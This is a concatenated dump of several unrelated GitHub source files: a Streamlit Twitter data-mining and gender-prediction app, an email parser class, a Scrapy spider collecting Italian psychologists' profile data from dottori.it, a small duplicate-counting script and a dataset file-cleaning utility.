\"Hashtags\", \"Source\", \"in_reply_to_name\", \"mentioned_users\",\r\n \"Tweet URL\", \"Created At\", \"User Location\", \"Retweet Count\", \"Reply Count\", \"Mention Count\",\r\n \"Longitude\", \"Latitude\", \"Replies\", \"Retweeted Tweet\", \"Tweet ID\", \"Profile Image URL\"]\r\n dfgend = dfgend.drop(columns_to_drop, axis=1)\r\n dfgend['Gender'] = ''\r\n\r\n dfgend = dfgend.drop_duplicates(subset='User Name')\r\n\r\n # Load the model from the output.json file\r\n model = joblib.load('modelgend.pkl')\r\n\r\n # Predict gender for each tweet\r\n for index, tweet in dfgend.iterrows():\r\n features = [tweet['User Name'], tweet['User Description'], tweet['Text']]\r\n processed_tweet = preprocess_tweet(features, training_columns)\r\n prediction = predict_gender(model, processed_tweet, training_columns)\r\n dfgend.at[index, 'Gender'] = prediction\r\n\r\n # Group by gender to get gender distribution\r\n gender_counts = dfgend.groupby('Gender').size().reset_index(name='Count')\r\n\r\n # Create a pie chart for gender distribution in the corresponding column\r\n with columns[i]:\r\n fig = px.pie(gender_counts, values='Count', names='Gender', title='Gender Distribution - ' + file_path)\r\n st.plotly_chart(fig)\r\n\r\n\r\n \r\n\r\n##################################################################\r\nwith tab3:\r\n st.header(\"Data Mining\")\r\n container3=st.container()\r\n with container3:\r\n \r\n \r\n colta, coltb = st.columns([2, 2])\r\n with colta:\r\n \r\n with st.form(key=\"taccountform\"):\r\n accounts = st_tags(\r\n label='# Enter Account:',\r\n text='Press enter to add more',\r\n value=[],\r\n suggestions=[],\r\n maxtags=4,\r\n key='1')\r\n\r\n submit = st.form_submit_button(label=\"Submit\")\r\n if submit:\r\n for account in accounts:\r\n user = api.get_user(screen_name=account)\r\n name = user.name\r\n description = user.description\r\n\r\n\r\n # get the list of followers for the user\r\n followers = api.get_followers(screen_name=account)\r\n follower_list = [follower.screen_name for follower in followers]\r\n\r\n # get the list of users that the user follows\r\n following = api.get_friends(screen_name=account)\r\n following_list = [friend.screen_name for friend in following]\r\n\r\n # find friends that do not follow back\r\n not_followed_back = [friend for friend in following_list if friend not in follower_list]\r\n\r\n # find followers that have not been followed back\r\n not_following_back = [follower for follower in follower_list if follower not in following_list]\r\n\r\n # find friends that follow back\r\n followed_back = [friend for friend in following_list if friend in follower_list]\r\n\r\n # find followers that are also friends\r\n following_back = [follower for follower in follower_list if follower in following_list]\r\n\r\n\r\n # get the user's tweets\r\n tweets = api.user_timeline(screen_name=account, count=10, tweet_mode='extended')\r\n tweets_list = [tweet._json for tweet in tweets]\r\n\r\n # create a dictionary to store the user's information, tweets, friends, and followers\r\n user_data = {\r\n 'name': name,\r\n 'description': description,\r\n 'followers': follower_list,\r\n 'following': following_list,\r\n 'not_followed_back': not_followed_back,\r\n 'not_following_back': not_following_back,\r\n 'followed_back': followed_back,\r\n 'following_back': following_back,\r\n 'tweets': tweets_list\r\n }\r\n\r\n # Create a directory if it doesn't exist\r\n os.makedirs(\"twittl\", exist_ok=True)\r\n\r\n file_path = f\"twittl/{account}_data.json\"\r\n if os.path.exists(file_path):\r\n # Load existing data from the file\r\n with open(file_path, 'r') as json_file:\r\n existing_data = json.load(json_file)\r\n\r\n # Update the existing data with new data\r\n existing_data['name'] = name\r\n existing_data['description'] = description\r\n existing_data['followers'] = follower_list\r\n existing_data['following'] = following_list\r\n # Update other fields as needed\r\n\r\n # Write the updated data back to the file\r\n with open(file_path, 'w') as json_file:\r\n json.dump(existing_data, json_file)\r\n else:\r\n # Create a new file and write the data to it\r\n user_data = {\r\n 'name': name,\r\n 'description': description,\r\n 'followers': follower_list,\r\n 'following': following_list,\r\n 'tweets': tweets_list\r\n }\r\n # Add other fields as needed\r\n\r\n with open(file_path, 'w') as json_file:\r\n json.dump(user_data, json_file)\r\n\r\n \r\n with coltb:\r\n\r\n \r\n \r\n \r\n with st.form(key=\"tkeysform\"):\r\n # Add tag input for keywords\r\n keywords = st_tags(\r\n label='# Enter Keyword(s):',\r\n text='Press enter to add more',\r\n value=[],\r\n suggestions=[],\r\n maxtags=4,\r\n key='2'\r\n )\r\n\r\n # Add search button within the form\r\n search_button = st.form_submit_button(label=\"Search\")\r\n if search_button and keywords:\r\n for keyword in keywords:\r\n results = []\r\n\r\n # Perform search for each keyword\r\n tweets = client.search_recent_tweets(\r\n query=keyword,\r\n tweet_fields=[\r\n 'context_annotations', 'text', 'created_at', 'entities', 'source', 'geo', 'public_metrics',\r\n 'referenced_tweets'\r\n ],\r\n user_fields=['name', 'username', 'profile_image_url', 'description', 'location'],\r\n expansions=[\r\n 'author_id', 'referenced_tweets.id', 'referenced_tweets.id.author_id',\r\n 'in_reply_to_user_id', 'entities.mentions.username', 'geo.place_id'\r\n ],\r\n max_results=20\r\n )\r\n\r\n # Get users list from the includes object\r\n users = {u[\"id\"]: u for u in tweets.includes['users']}\r\n\r\n for tweet in tweets.data:\r\n # Initialize 'place_name' and 'in_reply_to_name' variables\r\n place_name = ''\r\n in_reply_to_name = ''\r\n # longitude = None\r\n # latitude = None\r\n\r\n user_id = tweet.author_id\r\n if user_id in users:\r\n user = users[user_id]\r\n user_name = user['name']\r\n user_screen_name = user['username']\r\n profile_image_url = user['profile_image_url']\r\n user_description = user['description']\r\n user_location = user.get('location', None)\r\n retweeted_user = None # Initialize the variable\r\n\r\n # Extract retweet, mention, and reply information\r\n retweet_count = tweet.public_metrics['retweet_count']\r\n reply_count = tweet.public_metrics['reply_count']\r\n mention_count = 0\r\n\r\n mentioned_users = []\r\n\r\n if 'entities' in tweet and 'mentions' in tweet.entities:\r\n mentions = tweet.entities['mentions']\r\n mention_count = len(mentions)\r\n\r\n for mention in mentions:\r\n mentioned_user_screen_name = mention['username']\r\n\r\n mentioned_users.append({\r\n 'User Screen Name': mentioned_user_screen_name\r\n })\r\n\r\n replies = []\r\n\r\n # Calculate reply count\r\n if tweet.in_reply_to_user_id is not None:\r\n reply_count += 1\r\n\r\n if 'referenced_tweets' in tweet:\r\n referenced_tweets = tweet.referenced_tweets\r\n for referenced_tweet in referenced_tweets:\r\n if referenced_tweet['type'] == 'retweeted':\r\n retweet_count += 1\r\n retweeted_tweet_id = referenced_tweet['id']\r\n try:\r\n retweeted_tweet = client.get_tweet(id=retweeted_tweet_id,\r\n tweet_fields=['text', 'author_id'])\r\n if retweeted_tweet:\r\n retweeted_tweet_data = retweeted_tweet.data\r\n retweeted_tweet_text = retweeted_tweet_data['text']\r\n retweeted_tweet_author_id = retweeted_tweet_data['author_id']\r\n\r\n # Get retweeted user's information\r\n if retweeted_tweet_author_id in users:\r\n retweeted_user = users[retweeted_tweet_author_id]\r\n retweeted_user_name = retweeted_user['name']\r\n retweeted_user_screen_name = retweeted_user['username']\r\n\r\n # Add retweet information to tweet_data\r\n tweet_data['Retweeted Tweet'] = {\r\n 'Text': retweeted_tweet_text,\r\n 'Author Name': retweeted_user_name,\r\n 'Author Screen Name': retweeted_user_screen_name\r\n }\r\n except Exception as e:\r\n print(f\"Error retrieving retweeted tweet: {e}\")\r\n\r\n elif referenced_tweet['type'] == 'replied_to':\r\n replied_tweet_id = referenced_tweet['id']\r\n try:\r\n replied_tweet = client.get_tweet(id=replied_tweet_id, tweet_fields=['author_id'])\r\n if replied_tweet:\r\n replied_user_id = replied_tweet.data['author_id']\r\n replied_user = users.get(replied_user_id, None)\r\n\r\n if replied_user:\r\n replied_user_screen_name = replied_user['username']\r\n replies.append({\r\n 'User Screen Name': replied_user_screen_name\r\n })\r\n except Exception as e:\r\n print(f\"Error retrieving replied tweet: {e}\")\r\n\r\n # Get latitude and longitude from place_id\r\n if 'geo' in tweet and 'place_id' in tweet.geo:\r\n place_id = tweet.geo['place_id']\r\n try:\r\n place = client.get_place(id=place_id, place_fields=['geo'])\r\n if place and 'geo' in place:\r\n latitude = place.geo['coordinates'][0]\r\n longitude = place.geo['coordinates'][1]\r\n except Exception as e:\r\n print(f\"Error retrieving place information: {e}\")\r\n\r\n # Add longitude and latitude to tweet_data\r\n tweet_data['Longitude'] = longitude if longitude else None\r\n tweet_data['Latitude'] = latitude if latitude else None\r\n\r\n # Get like count and quote count\r\n like_count = tweet.public_metrics['like_count']\r\n quote_count = tweet.public_metrics['quote_count']\r\n\r\n if 'entities' in tweet and 'hashtags' in tweet.entities:\r\n hashtags = [tag['tag'] for tag in tweet.entities['hashtags']]\r\n else:\r\n hashtags = []\r\n\r\n full_text = tweet.text\r\n\r\n # Extract relevant fields from tweet and user\r\n tweet_data = {\r\n 'User Name': user_name,\r\n 'User Screen Name': user_screen_name,\r\n 'Profile Image URL': profile_image_url,\r\n 'User Description': user_description,\r\n 'User Location': user_location if user_location else None,\r\n 'Created At': tweet.created_at,\r\n 'Tweet ID': tweet.id,\r\n 'Text': full_text,\r\n 'Hashtags': hashtags,\r\n 'Tweet URL': f\"https://twitter.com/{user_screen_name}/status/{tweet.id}\",\r\n 'Source': tweet.source or '',\r\n 'Retweet Count': retweet_count,\r\n 'Reply Count': reply_count,\r\n 'Mention Count': mention_count,\r\n 'in_reply_to_name': in_reply_to_name if in_reply_to_name else None,\r\n 'mentioned_users': mentioned_users if mentioned_users else [],\r\n }\r\n\r\n # Add replies list to tweet_data\r\n tweet_data['Replies'] = replies if replies else []\r\n\r\n results.append(tweet_data)\r\n\r\n # Create a directory if it doesn't exist\r\n os.makedirs(\"twitkeys\", exist_ok=True)\r\n\r\n # Save the results in a JSON file named with the keyword\r\n file_path = os.path.join(\"twitkeys\", f\"{keyword}.json\")\r\n try:\r\n if os.path.exists(file_path):\r\n # Load existing data from the file\r\n with open(file_path, 'r') as json_file:\r\n existing_data = json.load(json_file)\r\n\r\n # Append new data to the existing data\r\n existing_data['data'].extend(results)\r\n\r\n # Write the combined data back to the file\r\n with open(file_path, 'w') as json_file:\r\n json.dump(existing_data, json_file, cls=DateTimeEncoder)\r\n else:\r\n # Create a new file and write the data to it\r\n output = {\"data\": results}\r\n with open(file_path, 'w') as json_file:\r\n json.dump(output, json_file, cls=DateTimeEncoder)\r\n except Exception as e:\r\n print(f\"Error saving results to JSON file: {e}\")\r\n\r\n\r\n\r\n colc, cold=st.columns([2,2])\r\n with colc:\r\n container3a=st.container()\r\n with container3a:\r\n\r\n json_directory = \"twittl\"\r\n\r\n # Get the list of JSON files in the directory\r\n json_files = [file for file in os.listdir(json_directory) if file.endswith(\".json\")]\r\n\r\n # Loop through each JSON file\r\n for json_file in json_files:\r\n # Open the JSON file and load the data\r\n with open(os.path.join(json_directory, json_file), 'r') as f:\r\n user_data = json.load(f)\r\n\r\n # Extract the tweets from the user data\r\n tweets_list = user_data['tweets']\r\n # user_name = tweet['user']['name']\r\n\r\n # Create a placeholder for the tweets\r\n tweet_placeholder = st.empty()\r\n with tweet_placeholder:\r\n # Display the tweets\r\n # st.subheader(f\"Tweets from {json_file[:-10]}\") # Remove the '_data.json' part from the filename\r\n for tweet in tweets_list:\r\n user_name = tweet['user']['name']\r\n full_text = tweet['full_text']\r\n \r\n # print (user_name)\r\n screen_name=tweet['user']['screen_name']\r\n # st.write(f\"{screen_name}\")\r\n tweet_content = f\"{user_name}: {full_text}\"\r\n st.write(tweet_content)\r\n # st.write(\"---\")\r\n time.sleep(0.2) # Add a delay between each tweet (adjust as needed)\r\n \r\n\r\n with cold:\r\n container3b=st.container()\r\n with container3b:\r\n\r\n def display_tweets(file_path):\r\n with open(file_path, 'r') as json_file:\r\n data = json.load(json_file)\r\n tweets = data['data']\r\n\r\n for tweet in tweets:\r\n user_name=tweet['User Name']\r\n created_at=tweet['Created At']\r\n text=tweet['Text']\r\n \r\n tweet_content = f\"{user_name}:{created_at}{text}\"\r\n st.write(tweet_content)\r\n # st.write(\"---\")\r\n time.sleep(0.2) # Add a delay between each tweet (adjust as needed)\r\n\r\n directory = \"twitkeys\"\r\n json_files = [file for file in os.listdir(directory) if file.endswith('.json')]\r\n\r\n for json_file in json_files:\r\n file_path = os.path.join(directory, json_file)\r\n # st.header(json_file[:-5])\r\n tweet_placeholder = st.empty()\r\n with tweet_placeholder:\r\n display_tweets(file_path)\r\n\r\n\r\n ","repo_name":"picstare/Fortext","sub_path":"pages/1_Twitter.py","file_name":"1_Twitter.py","file_ext":"py","file_size_in_byte":67868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15985653997","text":"from typing import Any, Optional\n\nfrom easydata.parsers.text import Text\nfrom easydata.utils import email\n\n__all__ = (\"Email\",)\n\n\nclass Email(Text):\n def __init__(\n self,\n *args,\n domain: Optional[str] = None,\n **kwargs,\n ):\n\n self._domain = domain\n\n super().__init__(\n *args,\n **kwargs,\n )\n\n def parse_value(\n self,\n value: Any,\n data: Any,\n ):\n\n value = super().parse_value(value=value, data=data)\n\n if not value:\n return None\n\n if self._domain:\n email_value = email.search_one(value)\n\n # no need for adding a domain since it's already valid email\n if email_value:\n return email_value\n\n at_symbol = \"\" if value.endswith(\"@\") else \"@\"\n\n value = \"{}{}{}\".format(value, at_symbol, self._domain)\n\n return email.search_one(value)\n","repo_name":"easydatapy/easydata","sub_path":"easydata/parsers/email.py","file_name":"email.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"34245064714","text":"import json\r\nimport scrapy\r\nimport re\r\nimport csv\r\nimport os.path\r\nfrom scrapy_selenium import SeleniumRequest\r\n\r\n\r\nclass MiodottoreSpider(scrapy.Spider):\r\n name = 'dottori'\r\n title = 'dottori it'\r\n base_url = 'https://www.dottori.it'\r\n start_urls = [\r\n 'https://www.dottori.it/psicologo'\r\n ]\r\n count = 0\r\n count_links = 0\r\n\r\n @classmethod\r\n def clean_data(cls, data):\r\n if data and isinstance(data, str):\r\n data = data.encode('ascii', 'ignore').decode()\r\n return data\r\n\r\n @classmethod\r\n def get_index(cls, lst, index, default=''):\r\n \"\"\"\r\n return element on given index from list\r\n :param lst: list from which we will return element\r\n :param index: index of element\r\n :param default: return value if index out of range\r\n :return:\r\n \"\"\"\r\n return cls.clean_data(lst[index]) if isinstance(lst, list) and len(lst) > index else default\r\n\r\n def get_dict_value(self, data, key_list, default=''):\r\n \"\"\"\r\n gets a dictionary and key_list, apply key_list sequentially on dictionary and return value\r\n :param data: dictionary\r\n :param key_list: list of key\r\n :param default: return value if key not found\r\n :return:\r\n \"\"\"\r\n for key in key_list:\r\n if data and isinstance(data, dict):\r\n data = data.get(key, default)\r\n elif data and isinstance(data, list):\r\n data = self.get_index(data, key) if isinstance(key, int) else default\r\n else:\r\n return default\r\n return self.clean_data(data)\r\n\r\n def parse(self, response):\r\n profile_links = response.css(\".gtDoctorNameMedCen::attr(href)\").extract()\r\n for each_link in profile_links:\r\n yield response.follow(each_link, callback=self.parse_profile)\r\n next_page = self.get_index(response.css(\".doc-page-item\"), -1).css(\"a::attr(href)\").extract_first()\r\n if next_page is not None:\r\n self.count_links = self.count_links + 1\r\n print(self.count_links)\r\n yield SeleniumRequest(url='{}{}'.format(self.base_url, next_page), callback=self.parse, wait_time=3)\r\n\r\n def parse_profile(self, response):\r\n if response.status != 200:\r\n print(response.url)\r\n return\r\n item = dict()\r\n item['sequential_id'] = self.count\r\n item['global_id'] = None\r\n item['source'] = 'https://www.dottori.it'\r\n item['scrape_URL'] = response.url\r\n item['is_therapist'] = None\r\n item['title'] = response.css(\".doc-title-label::text\").extract_first()\r\n item[\"name\"] = response.css('h1[itemprop=\"name\"]::text').extract_first()\r\n item[\"is_verified\"] = True if response.css(\".icon-check\") else False\r\n if response.css('a[href=\"#view-feedback\"]'):\r\n item['review_number'] = self.get_index(\r\n re.findall(\"[0-9]+\", response.css('a[href=\"#view-feedback\"]::text').extract_first()), 0)\r\n else:\r\n item['review_number'] = None\r\n positive_review_number = 0\r\n reviews_number_2021 = 0\r\n positive_review_number_2021 = 0\r\n reviews_number_2020 = 0\r\n positive_review_number_2020 = 0\r\n reviews_number_2019 = 0\r\n positive_review_number_2019 = 0\r\n reviews_number_2018 = 0\r\n positive_review_number_2018 = 0\r\n for each_review in response.css(\".doc-modal-body #view-feedback .doc-comments-grid .doc-bubble-comment\"):\r\n if each_review.css(\".icon-like\"):\r\n positive_review_number += 1\r\n if each_review.css(\"header span+span.icon-like\"):\r\n if each_review.css(\".mb-2 .doc-comment-head::text\").extract_first().split(\"/\")[-1].strip() == '20':\r\n reviews_number_2020 += 1\r\n if each_review.css(\"header span+span.icon-unlike\"):\r\n if each_review.css(\"header+p span::text\").extract_first().split(\"/\")[-1].strip() == '20':\r\n reviews_number_2020 += 1\r\n if each_review.css(\"header span+span.icon-like\"):\r\n if each_review.css(\".mb-2 .doc-comment-head::text\").extract_first().split(\"/\")[-1].strip() == '20':\r\n positive_review_number_2020 += 1\r\n if each_review.css(\"header span+span.icon-like\"):\r\n if each_review.css(\".mb-2 .doc-comment-head::text\").extract_first().split(\"/\")[-1].strip() == '19':\r\n reviews_number_2019 += 1\r\n if each_review.css(\"header span+span.icon-unlike\"):\r\n if each_review.css(\"header+p span::text\").extract_first().split(\"/\")[-1].strip() == '19':\r\n reviews_number_2019 += 1\r\n if each_review.css(\"header span+span.icon-like\"):\r\n if each_review.css(\".mb-2 .doc-comment-head::text\").extract_first().split(\"/\")[-1].strip() == '19':\r\n positive_review_number_2019 += 1\r\n if each_review.css(\"header span+span.icon-like\"):\r\n if each_review.css(\".mb-2 .doc-comment-head::text\").extract_first().split(\"/\")[-1].strip() == '18':\r\n reviews_number_2018 += 1\r\n if each_review.css(\"header span+span.icon-unlike\"):\r\n if each_review.css(\"header+p span::text\").extract_first().split(\"/\")[-1].strip() == '18':\r\n reviews_number_2018 += 1\r\n if each_review.css(\"header span+span.icon-like\"):\r\n if each_review.css(\".mb-2 .doc-comment-head::text\").extract_first().split(\"/\")[-1].strip() == '18':\r\n positive_review_number_2018 += 1\r\n if each_review.css(\"header span+span.icon-like\"):\r\n if each_review.css(\".mb-2 .doc-comment-head::text\").extract_first().split(\"/\")[-1].strip() == '21':\r\n reviews_number_2021 += 1\r\n if each_review.css(\"header span+span.icon-unlike\"):\r\n if each_review.css(\".mb-2 .doc-comment-head::text\").extract_first().split(\"/\")[-1] == '21':\r\n reviews_number_2021 += 1\r\n if each_review.css(\"header span+span.icon-like\"):\r\n if each_review.css(\".mb-2 .doc-comment-head::text\").extract_first().split(\"/\")[-1].strip() == '21':\r\n positive_review_number_2021 += 1\r\n\r\n item['positive_review_number'] = positive_review_number\r\n item['reviews_number_2021'] = reviews_number_2021\r\n item['reviews_number_2020'] = reviews_number_2020\r\n item['reviews_number_2019'] = reviews_number_2019\r\n item['reviews_number_2018'] = reviews_number_2018\r\n item['positive_review_number_2021'] = positive_review_number_2021\r\n item['positive_review_number_2020'] = positive_review_number_2020\r\n item['positive_review_number_2019'] = positive_review_number_2019\r\n item['positive_review_number_2018'] = positive_review_number_2018\r\n item[\"address_1\"] = None\r\n item[\"city_1\"] = None\r\n item['latitude_1'] = None\r\n item['longitude_1'] = None\r\n item[\"label_1\"] = None\r\n item[\"address_2\"] = None\r\n item[\"city_2\"] = None\r\n item['latitude_2'] = None\r\n item['longitude_2'] = None\r\n item[\"label_2\"] = None\r\n item[\"address_3\"] = None\r\n item[\"city_3\"] = None\r\n item['latitude_3'] = None\r\n item['longitude_3'] = None\r\n item[\"label_3\"] = None\r\n item[\"address_4\"] = None\r\n item[\"city_4\"] = None\r\n item['latitude_4'] = None\r\n item['longitude_4'] = None\r\n item[\"label_4\"] = None\r\n response.css(\"div[data-medical-centers]::attr(data-medical-centers)\").extract_first()\r\n data = response.css(\"div[data-medical-centers]::attr(data-medical-centers)\").extract_first()\r\n addrees_json = response.css('script[type=\"application/ld+json\"]::text').extract_first()\r\n try:\r\n json_data = json.loads(addrees_json)\r\n except:\r\n print(\"json parsing error\")\r\n for index, each_address in enumerate(json_data.get(\"hasPOS\")):\r\n\r\n if index == 0:\r\n item[\"address_1\"] = each_address.get(\"geo\").get(\"address\").get(\"streetAddress\")\r\n item[\"city_1\"] = each_address.get(\"geo\").get(\"address\").get(\"addressLocality\")\r\n item['latitude_1'] = each_address.get(\"geo\").get('latitude')\r\n item['longitude_1'] = each_address.get(\"geo\").get('longitude')\r\n item[\"label_1\"] = each_address.get('name')\r\n if index == 1:\r\n item[\"address_2\"] = each_address.get(\"geo\").get(\"address\").get(\"streetAddress\")\r\n item[\"city_2\"] = each_address.get(\"geo\").get(\"address\").get(\"addressLocality\")\r\n item['latitude_2'] = each_address.get(\"geo\").get('latitude')\r\n item['longitude_2'] = each_address.get(\"geo\").get('longitude')\r\n item[\"label_2\"] = each_address.get('name')\r\n if index == 2:\r\n item[\"address_3\"] = each_address.get(\"geo\").get(\"address\").get(\"streetAddress\")\r\n item[\"city_3\"] = each_address.get(\"geo\").get(\"address\").get(\"addressLocality\")\r\n item['latitude_3'] = each_address.get(\"geo\").get('latitude')\r\n item['longitude_3'] = each_address.get(\"geo\").get('longitude')\r\n item[\"label_3\"] = each_address.get('name')\r\n if index == 3:\r\n item[\"address_4\"] = each_address.get(\"geo\").get(\"address\").get(\"streetAddress\")\r\n item[\"city_4\"] = each_address.get(\"geo\").get(\"address\").get(\"addressLocality\")\r\n item['latitude_4'] = each_address.get(\"geo\").get('latitude')\r\n item['longitude_4'] = each_address.get(\"geo\").get('longitude')\r\n item[\"label_4\"] = each_address.get('name')\r\n\r\n item[\"works_online\"] = True if response.css(\".doc-card__mode-label--video\") else False\r\n online_price_list = []\r\n offline_price_list = []\r\n if response.css(\"#tariffe #profile-health-service-preview\"):\r\n for each_price in response.css(\"#tariffe #profile-health-service-preview p\"):\r\n matches_offline = [\"online\", \"gruppo\", \"gruppi\", \"coppia\", \"coppie\", \"skype\", \"whatsapp\", \"internet\",\r\n \"video\"]\r\n matches_online = [\"online\", \"skype\", \"whatsapp\", \"internet\", \"video\"]\r\n if any(x in each_price.css(\"::text\").extract_first() for x in matches_online):\r\n if each_price.css(\".font-weight-normal::text\").extract_first():\r\n if \"da €\" in each_price.css(\".font-weight-normal::text\").extract_first():\r\n price_range = re.findall(\"[0-9]+\\.[0-9]+|[0-9]+\",\r\n each_price.css(\".font-weight-normal::text\").extract_first())\r\n online_price_list.append(int(self.get_index(price_range, 0).replace(\".\", \"\")))\r\n elif re.search(\"[0-9]+\\.[0-9]+\", each_price.css(\".font-weight-normal::text\").extract_first()):\r\n online_price_list.append(int(self.get_index(re.findall(\"[0-9]+\", each_price.css(\r\n \".font-weight-normal::text\").extract_first().replace(\".\", \"\")), 0)))\r\n else:\r\n online_price_list.append(int(self.get_index(\r\n re.findall(\"[0-9]+\", each_price.css(\".font-weight-normal::text\").extract_first()), 0)))\r\n if any(x in each_price.css(\"::text\").extract_first() for x in matches_offline):\r\n pass\r\n else:\r\n if each_price.css(\".font-weight-normal::text\").extract_first() == None or each_price.css(\r\n \".font-weight-normal::text\").extract_first() == \"\":\r\n pass\r\n else:\r\n if \"da €\" in each_price.css(\".font-weight-normal::text\").extract_first():\r\n price_range = re.findall(\"[0-9]+\\.[0-9]+|[0-9]+\",\r\n each_price.css(\".font-weight-normal::text\").extract_first())\r\n offline_price_list.append(int(self.get_index(price_range, 0).replace(\".\", \"\")))\r\n elif re.search(\"[0-9]+\\.[0-9]+\", each_price.css(\".font-weight-normal::text\").extract_first()):\r\n offline_price_list.append(int(self.get_index(re.findall(\"[0-9]+\", each_price.css(\r\n \".font-weight-normal::text\").extract_first().replace(\".\", \"\")), 0)))\r\n else:\r\n offline_price_list.append(int(\r\n self.get_index(\r\n re.findall(\"[0-9]+\", each_price.css(\".font-weight-normal::text\").extract_first()),\r\n\r\n 0)))\r\n if online_price_list:\r\n item[\"price_online\"] = min(online_price_list)\r\n else:\r\n item[\"price_online\"] = None\r\n if offline_price_list:\r\n item[\"price_offline\"] = min(offline_price_list)\r\n else:\r\n item[\"price_offline\"] = None\r\n item[\"telephone_1\"] = self.get_index(response.css(\"a[href^='tel:']::text\").extract(), 0)\r\n item[\"telephone_2\"] = self.get_index(response.css(\"a[href^='tel:']::text\").extract(), 1)\r\n item[\"telephone_3\"] = self.get_index(response.css(\"a[href^='tel:']::text\").extract(), 2)\r\n item[\"email\"] = None\r\n item[\"website\"] = None\r\n item[\"description\"] = \"\".join(response.css(\".doc-text-box p::text\").extract())\r\n item[\"conditions\"] = \",\".join(response.css(\"#patologie p::text\").extract())\r\n specalization_list = []\r\n for each in response.css(\"#patologie ul li\"):\r\n if each.css(\"li span[data-placement]\"):\r\n specalization_list.append(each.css(\"li p::text\").extract_first())\r\n item[\"specialties\"] = \",\".join(specalization_list)\r\n item[\"ages_treated\"] = None\r\n item[\"therapy_type\"] = None\r\n item[\"social_instagram\"] = None\r\n item[\"social_facebook\"] = None\r\n item[\"social_linkedin\"] = None\r\n item[\"does_qa\"] = None\r\n item[\"albo\"] = None\r\n item[\"albo_numero\"] = None\r\n item[\"has_publications\"] = None\r\n item[\"photo\"] = response.css(\".doc-photo img::attr(data-src)\").extract_first()\r\n item[\"photo_large\"] = None\r\n item[\"qualifications_dottori.it\"] = \",\".join(\r\n response.css(\".profile-header-card__profile h1+div span::text\").extract())\r\n for each in response.css(\".mb-3\"):\r\n if 'Abilitazione' in each.css(\"h4 strong::text\").extract():\r\n item[\"albo\"] = \" \".join([w for w in each.css(\"ul li::text\").extract_first().split() if not w.isdigit()])\r\n item[\"albo_numero\"] = self.get_index(re.findall(\"[0-9]+\", each.css(\"ul li::text\").extract_first()), 0)\r\n item[\"website\"] = response.css(\".website-link::attr(href)\").extract_first()\r\n file_name = \"dottori_it.csv\"\r\n file_exists = os.path.isfile(file_name)\r\n with open(file_name, 'a', encoding=\"utf-8\") as csvfile:\r\n headers = item.keys()\r\n writer = csv.DictWriter(csvfile, delimiter=',', lineterminator='\\n', fieldnames=headers)\r\n if not file_exists:\r\n writer.writeheader() # file doesn't exist yet, write a header\r\n writer.writerow(item)\r\n yield\r\n","repo_name":"m-mohsin-iqbal/dottori_it_scraper","sub_path":"dottori_it/spiders/miodottore_spider.py","file_name":"miodottore_spider.py","file_ext":"py","file_size_in_byte":15623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23346115546","text":"n=int(input())\n\nl=[]\nfor i in range(n):\n l.append(int(input()))\n \n#duplicate by frequncy \ndict={}\n\nfor i in range(n):\n dict[l[i]]=l.count(l[i])\n #frequency....\n # if l.count(l[i])>1:\n # print('duplicate:',l[i])\n \n#values..\n# print(dict.items())\n\nfor k,v in dict.items():\n # print(k,v)\n if v>1:\n print(k)\n\n","repo_name":"showribabu/Programms","sub_path":"ass_5.4_.py","file_name":"ass_5.4_.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11880418161","text":"# -*-coding:utf-8-*-\r\n\r\n# ===============================================================================\r\n# 用于两类数据集清洗\r\n# sod数据集\r\n# ===============================================================================\r\n\r\nimport os\r\nimport time\r\nimport difflib\r\nimport hashlib\r\nimport stat\r\n\r\n\r\ndef getFileMd5(filename):\r\n if not os.path.isfile(filename):\r\n print('file not exist: ' + filename)\r\n return\r\n myhash = hashlib.md5()\r\n f = open(filename, 'rb')\r\n while True:\r\n b = f.read(8096)\r\n if not b:\r\n break\r\n myhash.update(b)\r\n f.close()\r\n return myhash.hexdigest()\r\n\r\n\r\ndef getAllFiles(path):\r\n flist = []\r\n for root, dirs, fs in os.walk(path):\r\n for f in fs:\r\n f_fullpath = os.path.join(root, f)\r\n f_relativepath = f_fullpath[len(path):]\r\n flist.append(f_relativepath)\r\n return flist\r\n\r\n\r\ndef dirCompare(apath, bpath):\r\n afiles = getAllFiles(apath)\r\n bfiles = getAllFiles(bpath)\r\n\r\n setA = set(afiles)\r\n setB = set(bfiles)\r\n\r\n # commonfiles = setA & setB # 处理共有文件\r\n\r\n # for f in sorted(commonfiles):\r\n # amd=getFileMd5(apath+'\\\\'+f)\r\n # bmd=getFileMd5(bpath+'\\\\'+f)\r\n # if amd != bmd:\r\n # print (\"dif file: %s\" %(f))\r\n\r\n # 处理仅出现在一个目录中的文件\r\n onlyFiles = setA ^ setB\r\n onlyInA = []\r\n onlyInB = []\r\n thislist = []\r\n\r\n for of in onlyFiles:\r\n if of in afiles:\r\n onlyInA.append(of)\r\n elif of in bfiles:\r\n onlyInB.append(of)\r\n\r\n if len(onlyInA) > 0:\r\n print('-' * 20, \"only in A\", apath, '-' * 20,len(onlyInA))\r\n for of in sorted(onlyInA):\r\n #print(of)\r\n a = apath + of\r\n thislist.append(a)\r\n\r\n if len(onlyInB) > 0:\r\n print('-' * 20, \"only in B\", bpath, '-' * 20,len(onlyInB))\r\n for of in sorted(onlyInB):\r\n #print(of)\r\n b = bpath + of\r\n thislist.append(b)\r\n\r\n return thislist\r\n\r\n\r\ndef deleteFile(deletelist):\r\n for i in deletelist:\r\n if os.path.exists(i):\r\n os.remove(i)\r\n\r\nif __name__ == '__main__':\r\n from mypath import Path\r\n root = Path.db_root_dir('small_obstacle')\r\n # root = 'F:/Small_Obstacle_Dataset/'\r\n splits = ['train','val','test']\r\n deleteList = []\r\n\r\n for split in splits:\r\n trainSeq = os.listdir(os.path.join(root, split))\r\n for seq in trainSeq:\r\n imagePath = os.path.join(root, split, seq, 'image')\r\n labelPath = os.path.join(root, split, seq, 'labels')\r\n\r\n # labelPath = r'F:\\Small_Obstacle_Dataset\\train\\file_3\\labels'\r\n # imagePath = r'F:\\Small_Obstacle_Dataset\\train\\file_3\\image'\r\n #\r\n tmp = dirCompare(imagePath, labelPath)\r\n deleteList.extend(tmp)\r\n\r\n print(deleteList)\r\n # import pickle\r\n # 